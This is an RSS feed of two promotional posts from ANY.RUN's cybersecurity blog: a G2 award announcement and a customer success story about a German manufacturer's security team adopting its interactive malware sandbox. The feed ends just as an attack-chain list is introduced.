<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">

<channel>
	<title>ANY.RUN RSS feed</title>
	<atom:link href="https://any.run/cybersecurity-blog/feed/" rel="self" type="application/rss+xml"/>
	<link/>
	<description>The latest posts and cybersecurity news</description>
	<lastBuildDate>Thu, 10 Sep 2026 09:39:02 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/cropped-Favicon_WebSite_Rounded-32x32.png</url>
	<title>ANY.RUN's Cybersecurity Blog</title>
	<link/>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>ANY.RUN Secures Leader Status in G2’s Malware Analysis Rankings</title>
		<link>https://any.run/cybersecurity-blog/g2-leader-fall-2026/</link>
					<comments>https://any.run/cybersecurity-blog/g2-leader-fall-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 10 Sep 2026 09:39:01 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23067</guid>

					<description><![CDATA[<p>We’re excited to share that ANY.RUN has once again been recognized by G2 as a leader in malware analysis. In G2’s Fall 2026 awards, we earned both Momentum Leader and Grid Leader recognition, highlighting our continued growth and strong position in the market. Most importantly, these achievements reflect the trust security professionals place in ANY.RUN [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/g2-leader-fall-2026/">ANY.RUN Secures Leader Status in G2’s Malware Analysis Rankings</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">We’re excited to share that <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> has <a href="https://any.run/cybersecurity-blog/g2-summer-awards-2026/" target="_blank" rel="noreferrer noopener">once again</a> been recognized by G2 as a leader in malware analysis. </p>



<p class="wp-block-paragraph">In G2’s Fall 2026 awards, we earned both <a href="https://www.g2.com/reports/19c6dd85-1509-4852-a7e3-532b1dcad4fd/preview?product=any-run-sandbox&amp;_gl=1*qg889r*_ga*NDY2NDAzMDM4LjE3ODM2MDI4NDI." target="_blank" rel="noreferrer noopener"><strong>Momentum Leader</strong></a> and <a href="https://www.g2.com/reports/79822bf6-40c1-4fcb-a26b-a14e34b5f279/preview?product=any-run-sandbox&amp;_gl=1*1j2epdy*_ga*NDY2NDAzMDM4LjE3ODM2MDI4NDI." target="_blank" rel="noreferrer noopener"><strong>Grid Leader</strong></a> recognition, highlighting our continued growth and strong position in the market. Most importantly, these achievements reflect the trust <a href="https://any.run/cybersecurity-blog/german-manufacturer-success-story/" target="_blank" rel="noreferrer noopener">security professionals</a> place in ANY.RUN every day to support their threat investigations. </p>



<h2 class="wp-block-heading">How ANY.RUN Delivers Measurable Value for Modern SOCs </h2>



<p class="wp-block-paragraph">G2’s Grid Leader and Momentum Leader awards offer two complementary perspectives on a technology solution. </p>



<p class="wp-block-paragraph">Being named a Grid Leader reflects strong customer satisfaction combined with a solid market presence. Momentum Leader recognition highlights products demonstrating significant momentum within their category.  </p>



<p class="wp-block-paragraph">For ANY.RUN, reaching both achievements in the malware analysis category demonstrates two things we care deeply about: delivering <a href="https://any.run/cybersecurity-blog/phishing-us-finance/" target="_blank" rel="noreferrer noopener">measurable value</a> to security teams and continuing to evolve alongside the threats they investigate. </p>



<p class="wp-block-paragraph">SOCs today need more than just a place to upload suspicious files. Analysts need <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">instant visibility</a> into what a threat actually does. SOC leaders need confidence that their teams can investigate incidents efficiently and consistently. </p>



<p class="wp-block-paragraph">That is the problem <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> continues to solve. </p>



<figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="2560" height="1211" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-scaled.png" alt="" class="wp-image-22257" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-scaled.png 2560w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-1024x485.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-768x363.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-1536x727.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-2048x969.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-740x350.png 740w" sizes="(max-width: 2560px) 100vw, 2560px" /><figcaption class="wp-element-caption"><em>ANY.RUN helps security teams streamline investigations, reduce costs, and stay compliant</em> </figcaption></figure>



<p class="wp-block-paragraph">ANY.RUN helps teams establish a more <a href="https://any.run/cybersecurity-blog/proactive-threat-hunting/" target="_blank" rel="noreferrer noopener">consistent approach</a> to threat investigation by giving analysts access to shared analysis and intelligence capabilities. This can reduce repetitive work, make investigation processes easier to standardize, and help teams make better use of their expertise. </p>



<p class="wp-block-paragraph">By supporting investigations across multiple environments, including Windows, Linux, macOS, and Android, we give teams broader visibility when analyzing threats that target different platforms. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
See what ANY.RUN can do for your SOC.<br>
Cut MTTR by 21 min per case &#038; <span class="highlight">respond with confidence</span>.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=g2-leader-fall-2026&#038;utm_term=100926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Helping SOC Leaders Build More Efficient Operations </h2>



<p class="wp-block-paragraph">For <a href="https://any.run/cybersecurity-blog/enterprise-phishing-resilience/" target="_blank" rel="noreferrer noopener">SOC leaders</a>, the value of extended investigation opportunities extends beyond individual alerts. The bigger challenge is creating an operation that can <a href="https://any.run/cybersecurity-blog/mssp-triage-response-bottlenecks/" target="_blank" rel="noreferrer noopener">handle growing volumes of threats</a> without sacrificing analysis quality. </p>



<p class="wp-block-paragraph">ANY.RUN also fits into existing security workflows through integrations and team-oriented capabilities, helping organizations incorporate analysis into the processes they already use. </p>



<p class="wp-block-paragraph">At scale, this translates into a practical advantage: analysts can work from a common source of threat context, while security teams can connect ANY.RUN with existing SIEM, TIP, and SOAR environments through APIs, SDKs, and out-of-the-box integrations. </p>



<p class="wp-block-paragraph"><a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktointegrations" target="_blank" rel="noreferrer noopener">Explore all ANY.RUN integrations</a> </p>



<p class="wp-block-paragraph">By integrating ANY.RUN into their workflows, SOCs can improve operational efficiency at scale. 95% of SOCs report faster threat investigations, while teams can reduce MTTR by up to 21 minutes per case and cut Tier 1 workload by up to 20%. </p>



<h2 class="wp-block-heading">Recognition That Reflects the People Using ANY.RUN </h2>



<p class="wp-block-paragraph">The most meaningful part of each G2 recognition isn’t the badge itself but the experience behind it. </p>



<p class="wp-block-paragraph">ANY.RUN is used by over 700,000 security professionals around the world, as well as 16,000+ SOC and MSSP teams that <a href="https://any.run/cybersecurity-blog/streamline-your-soc/" target="_blank" rel="noreferrer noopener">rely on our solutions</a> for malware analysis, threat intelligence, alert triage, phishing investigations, threat hunting, and incident response. </p>



<figure class="wp-block-image size-full"><img decoding="async" width="2426" height="1058" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby.png" alt="" class="wp-image-23071" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby.png 2426w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-300x131.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-1024x447.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-768x335.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-1536x670.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-2048x893.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-370x161.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-270x118.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-740x323.png 740w" sizes="(max-width: 2426px) 100vw, 2426px" /><figcaption class="wp-element-caption">ANY.RUN is trusted by companies across industries and regions</figcaption></figure>



<p class="wp-block-paragraph">Every investigation performed with ANY.RUN represents a real security decision: whether an alert is malicious, whether a link is safe, whether an endpoint has been compromised, or whether an incident requires escalation. </p>



<p class="wp-block-paragraph">Our responsibility is to make those decisions easier to reach and more reliable. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn threat investigations into <span class="highlight">faster decisions</span>. <br>
Discover how to streamline workflows with ANY.RUN.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Explore for Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">Being named a Momentum Leader and Grid Leader in G2’s Fall 2026 rankings is recognition of the progress we have made with the cybersecurity community and motivation to keep improving. </p>



<p class="wp-block-paragraph">We will continue investing in the capabilities that matter most to security teams: faster investigations, richer context, stronger threat intelligence, broader threat coverage, and workflows that reduce unnecessary effort for analysts. </p>



<p class="wp-block-paragraph">For analysts, that means better tools for understanding what threats actually do. For SOC leaders, it means building more efficient, consistent, and resilient security operations. And for the organizations they protect, it means turning threat data into confident action sooner. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> develops cybersecurity solutions for SOC and MSSP teams, supporting threat monitoring, detection, triage, investigation, and incident response.  </p>



<p class="wp-block-paragraph"><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive sandbox</a> analysis combined with <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">threat intelligence</a> capabilities supported by over 16,000 organizations worldwide help security professionals understand threats and make confident decisions faster. </p>



<p class="wp-block-paragraph">For enterprises, ANY.RUN helps reduce investigation time and analyst workload while supporting secure, compliant operations. </p>



<p class="wp-block-paragraph">ANY.RUN is SOC 2 Type II attested and committed to strong security control and customer data protection. Privacy is also ensured by SSO, MFA, role-based access controls, and integrations with existing security tools that help SOCs scale efficiently and maintain control. </p>



<h2 class="wp-block-heading">FAQ</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1789033042982"><strong class="schema-faq-question"><strong>1. Is ANY.RUN a G2 Leader in Malware Analysis?</strong></strong> <p class="schema-faq-answer">Yes. ANY.RUN was named a Momentum Leader and Grid Leader in G2’s Fall 2026 Malware Analysis rankings.</p> </div> <div class="schema-faq-section" id="faq-question-1789033059483"><strong class="schema-faq-question"><strong>2. What does G2 Momentum Leader mean?</strong><br></strong> <p class="schema-faq-answer">It recognizes products demonstrating strong momentum and growth within their category.</p> </div> <div class="schema-faq-section" id="faq-question-1789033069723"><strong class="schema-faq-question"><strong>3. What does G2 Grid Leader mean?</strong><br></strong> <p class="schema-faq-answer">Grid Leaders combine high customer satisfaction with a strong market presence.</p> </div> <div class="schema-faq-section" id="faq-question-1789033078132"><strong class="schema-faq-question"><strong>4. How does ANY.RUN help SOC teams?</strong><br></strong> <p class="schema-faq-answer">ANY.RUN helps teams investigate threats faster, reduce manual workload, and make more confident security decisions.</p> </div> <div class="schema-faq-section" id="faq-question-1789033095579"><strong class="schema-faq-question"><strong>5. What threats can SOC teams investigate with ANY.RUN?</strong><br></strong> <p class="schema-faq-answer">Teams can analyze malware, phishing, suspicious files, URLs, and related threat activity across Windows, Linux, macOS, and Android.</p> </div> </div>
<p>The post <a href="https://any.run/cybersecurity-blog/g2-leader-fall-2026/">ANY.RUN Secures Leader Status in G2’s Malware Analysis Rankings</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/g2-leader-fall-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>15 Minutes Saved Per Alert: How a Lean German Manufacturer Protects 10,000 Endpoints with ANY.RUN</title>
		<link>https://any.run/cybersecurity-blog/german-manufacturer-success-story/</link>
					<comments>https://any.run/cybersecurity-blog/german-manufacturer-success-story/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 09 Sep 2026 07:47:47 +0000</pubDate>
				<category><![CDATA[Customer Success Story]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23040</guid>

					<description><![CDATA[<p>Security teams in the manufacturing sector face persistent operational demands. Recent ANY.RUN data shows their workloads are roughly 22% higher than those in other major industries. To get an insider&#8217;s view on how teams navigate these industry demands, we sat down with Philipp Z., Security Lead at a leading German manufacturer. He shared how replacing [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/german-manufacturer-success-story/">15 Minutes Saved Per Alert: How a Lean German Manufacturer Protects 10,000 Endpoints with ANY.RUN</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Security teams in the manufacturing sector face persistent operational demands. Recent <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> data shows their workloads are roughly <strong>22% higher</strong> than those in other major industries.</p>



<p class="wp-block-paragraph">To get an insider&#8217;s view on how teams navigate these industry demands, we sat down with Philipp Z., Security Lead at a leading German manufacturer. He shared how replacing complex manual analysis with ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> helped his team <strong>accelerate incident response by 15 minutes per case</strong>, eliminate tedious routines, and strengthen their overall security posture.</p>



<h2 class="wp-block-heading">Customer Profile: Protecting a Large-Scale Industrial Footprint with a Small, Agile Team </h2>



<p class="wp-block-paragraph">Philipp’s company has a massive computer network with 10,000 devices and 10,000 users, including both office computers and servers. To protect this huge system, they don&#8217;t use a massive security department. Instead, everything is run by a quick, flexible team of just five professionals. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>Our responsibilities include proactive hardening and reactive response. When alerts appear in our XDR system, we analyze them, react quickly, and execute our security procedures like immediately isolating devices or pushing cloud reinstalls. It is a massive footprint, and we have to handle it dynamically.</em></p>
<cite><strong>Philipp Z., Security Lead</strong> </cite></blockquote>



<p class="wp-block-paragraph">They split their focus between two main jobs: stopping threats early and responding quickly. When security alerts pop up in their monitoring system, they immediately jump in to contain and inspect the problem. When things are quiet, they work with other IT teams to upgrade the company’s overall defenses. </p>



<h2 class="wp-block-heading">The Challenge: Forensic Laptop Bottleneck and Selective Triage </h2>



<p class="wp-block-paragraph">Before switching to <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, the German company ran into major delays because of how they analyzed threats. Their XDR was great at flagging potential dangers, but it couldn&#8217;t show them how a file or URL actually behaved in real time.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>It’s less burnout and also less work in general. The hassle of just booting the different machine, going to the VM, entering any encryption keys&#8230; it just was tedious work. It was not rewarding work or any fun work&#8230;</em></p>
<cite>Philipp Z., Security Lead</cite></blockquote>



<p class="wp-block-paragraph">To safely analyze potential malware and phishing, the team had to use a single dedicated laptop kept completely offline. This machine ran a host Ubuntu operating system, which housed a virtualized Flare VM and the SANS forensic toolkit. </p>



<p class="wp-block-paragraph">While this setup was functional, it introduced problems: </p>



<ul class="wp-block-list">
<li><strong>Long Setup Time:</strong> Physically retrieving the laptop, booting up, entering multiple keys, and configuring VMs <strong>ate up 5 to 10 minutes of critical triage</strong> <strong>time</strong> before analysis could start. </li>



<li><strong>Risky Manual Data Transfer:</strong> Being fully air-gapped made moving data tedious and risky. Analysts had to manually copy files via USB or type complex URLs by hand. </li>



<li><strong>Single-User Access:</strong> As a single physical laptop at HQ, only one analyst could use it at a time, creating immediate backlogs during concurrent alerts. </li>
</ul>



<p class="wp-block-paragraph">This setup created an even bigger issue when the team started working from home. Analysts spent about 25% of their time working remotely. If a threat hit on a remote day, workers could not use the office laptop at all, leaving dangerous security gaps. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>Before, we were carefully selecting the stuff that we really want to analyze, because it was just so much work, and for everything else, it was easier to just assume true positive.</em></p>
<cite><strong>Philipp Z., Security Lead</strong> </cite></blockquote>



<p class="wp-block-paragraph">On top of that, testing just one file took so much time and effort that the five-person team could only check a tiny fraction of their alerts. They had to constantly pick and choose which suspicious files to inspect and which ones to skip completely. </p>



<p class="wp-block-paragraph">Since they couldn’t check every alert, the team had to assume the worst every time. Whenever a suspicious file popped up, they would disconnect the user&#8217;s computer and completely wipe it, reinstalling everything from scratch. While this brute-force method kept the network safe, it dumped a huge amount of extra work on the IT staff and left employees unable to work for hours. </p>



<h2 class="wp-block-heading">The Solution: Building a Scalable, Cloud-Managed Interactive Triage Workspace </h2>



<p class="wp-block-paragraph">To break free from the constraints of physical hardware and manual setup times, the company needed an enterprise-grade solution for triaging files and URLs that was completely isolated, cloud-managed, and accessible from anywhere. They found the answer in ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>During my time as a student, I was able to experience the platform first hand. The usability is great, the options that you have are great… And of course, as an enterprise, the pricing is also great.</em></p>
<cite><strong>Philipp Z., Security Lead</strong></cite></blockquote>



<p class="wp-block-paragraph">ANY.RUN fit the company’s security team needs perfectly, giving them a safe, central workspace without any of the old setup headaches: </p>



<ul class="wp-block-list">
<li><strong>Complete Safety and Privacy: </strong>The sandbox runs entirely in a private cloud, kept totally separate from the company&#8217;s main network. Analysts can open dangerous files and links with zero risk of spreading malware, infecting their own computers, or exposing sensitive data. </li>



<li><strong>Distributed and Remote-Ready:</strong> Being cloud-managed, <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> is accessible from any location. Whether the team is working in the office or from home during their remote office rotations, they have identical access to deep behavioral analysis.</li>



<li><strong>Fast, Interactive Triage:</strong> The team created a quick, simple workflow. When users report suspicious emails or potential phishing links, analysts simply copy the link, paste it into ANY.RUN, interact with the live virtual machine to observe behavior, and receive a definitive verdict in seconds. </li>
</ul>



<p class="wp-block-paragraph">While the immediate visual verdict in ANY.RUN is sufficient for the team&#8217;s rapid daily triage, documenting these investigations is critical for compliance. The team relies on ANY.RUN&#8217;s comprehensive reporting feature for audit support. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>The verdict is usually enough for our daily analyst work. We download the report for archival stuff, and if the compliance department wants to have a review at our work&#8230; Two or three months later, someone wants to ask, &#8216;Hey, why did you decide on this specific case?&#8217; I don&#8217;t know, I have had a thousand cases in the meantime, so I have to look at the report. And then I say, &#8216;Okay, this is why we responded like that.</em></p>
<cite><strong>Philipp Z., Security Lead</strong></cite></blockquote>



<p class="wp-block-paragraph">ANY.RUN proved so effective that the company gave licenses to two Exchange email admins. Strict filters often quarantine normal emails, which used to drag security analysts away from major threats. Now, email admins safely test held files and links in ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> themselves, quickly releasing clean messages without wasting the security team&#8217;s time.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Remove the manual work slowing down threat triage.
</span> 
<br>
Give your team more time for the incidents that matter.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=german-manufacturer-success-story&#038;utm_term=090926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Cut Triage Time </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">SOC Results: Shrinking Response Times and Fueling Analyst Engagement </h2>



<p class="wp-block-paragraph">The biggest quick win after starting with ANY.RUN was how much faster the team could process security alerts. By cutting out all the manual steps of setting up a physical laptop and configuring virtual machines, the <strong>team now saves an average of 15 minutes on every single alert they investigate</strong>. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>In median, I think we were able to take 15 minutes from every alert response, just by using ANY.RUN, without anything else, without the analysis time and the time it saves us. Just by being able to look at the process tree, just the whole starting VM pointing stuff there alone per incident, 15 minutes. Which is a lot if you are time-critical&#8230;</em></p>
<cite><strong>Philipp Z., Security Lead</strong></cite></blockquote>



<p class="wp-block-paragraph">These time savings directly help the team take fast action against serious security threats. The company maintains an impressive response goal of just 2.5 minutes from the moment a dangerous alert goes off to completely locking down the affected device. </p>



<p class="wp-block-paragraph">By making threat analysis almost instant and easy, ANY.RUN gives the five-person team the extra power they need to handle heavy workloads. Instead of making risky compromises or guessing which alerts matter, the team can now easily check every single suspicious link, reported email, or flagged file that comes their way. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>Before, we were carefully selecting the stuff that we really want to analyze, because it was just so much work, and for everything else, it was easier to just assume true positive. But now, we just like to put anything we deem suspicious into ANY.RUN and have a look&#8230; </em><strong><em>My team is handling 20, 30, 40 tasks per day</em></strong><em>, so it is good at scale.</em></p>
<cite><strong>Philipp Z., Security Lead</strong> </cite></blockquote>



<p class="wp-block-paragraph">To ensure the integrity of their triage, Philipp&#8217;s team actively tracks a key performance indicator, <strong>KPI agreement rate</strong> with ANY.RUN’s true/false positive classifications. Currently, it stands at <strong>95%</strong>, showing total confidence in their threat determinations. </p>



<p class="wp-block-paragraph">In an industry with high workloads and tedious tasks, repetitive workflows regularly lead to professional exhaustion. Introducing ANY.RUN has directly improved the team’s daily work environment. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>ANY.RUN just makes the job fun, because you just point the VM, you can explore it, you can try to see what happens if you execute the malware, and then dig deeper from the process tree&#8230; It is definitely a good addition to the team, because SOC burnout is very much a threat that I want to prevent in my team.</em></p>
<cite><strong>Philipp Z., Security Lead</strong></cite></blockquote>



<p class="wp-block-paragraph">By removing the non-rewarding and exhausting physical chores of the legacy system, the job has once again become an engaging, investigative experience. Analysts are now empowered to safely and interactively explore how threats operate, digging deep into process trees and visual execution paths. </p>



<h2 class="wp-block-heading">How ANY.RUN Helped Detect an Encrypted Multi-Stage Email Threat </h2>



<p class="wp-block-paragraph">A good example of ANY.RUN’s hands-on value happened when the team had to investigate a complex attack designed to exploit the blind spots of automated security. </p>



<p class="wp-block-paragraph">The incident began when their XDR system flagged a suspicious shortcut (.lnk) file being opened on a computer. Following strict protocol, the analyst immediately isolated the machine to stop any potential threat from spreading while they investigated. </p>



<p class="wp-block-paragraph">Using the computer’s history logs, they traced the file back to a web download, which led them back to an incoming email. To uncover the full, multi-stage delivery architecture, the analyst detonated the suspicious email from the XDR in ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>.<strong> The analysis revealed the following attack chain:</strong></p>



<ol start="1" class="wp-block-list">
